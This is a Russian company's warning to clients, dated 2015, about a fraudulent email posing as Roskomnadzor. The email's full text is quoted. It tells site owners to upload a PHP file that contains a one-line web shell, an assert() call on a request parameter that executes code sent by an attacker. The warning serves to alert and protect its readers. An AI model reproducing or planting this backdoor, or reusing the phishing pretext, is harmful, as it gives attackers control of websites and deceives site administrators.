Заказать звонок

Отправляя форму, Вы принимаете политику конфиденциальности
27.08.2015

Письма от Роскомнадзора

Уважаемые клиенты! Если Вы получили письмо следующего содержания:

27.08.2015, 00:23, "Роскомнадзор" <zapret-info@roskomnadzor.org>:

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени example.ru в сети «Интернет».


В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайт DomainName был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени example.ru, Вам необходимо:
1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени example.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: DomainName/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени example.ru, следую инструкции указанной выше, то Ваш сайт chadorado.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.
-------------------
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.
--

будьте бдительны, данное сообщение является мошенническим. Предпринимать каких-либо действий на сайте по факту данного письма не стоит. При размещении указанного кода в корень сайта, скрипт запустит выполнение команды, истинная цель которой известна только ее авторам, возможно это получение конфиденциальных данных или доступа к сайту.

Со своей стороны Вы можете, например, обратиться с жалобой в Роскомнадзор, предоставив им оригинал письма, возможно, они смогут предпринять какие-либо действия для вычисления злоумышленников и пресечения их дальнейшей деятельности. 

Хотите получать информацию от лидера рынка?

Подпишитесь на рассылку!

Оставляя заявку, вы принимаете политику конфиденциальности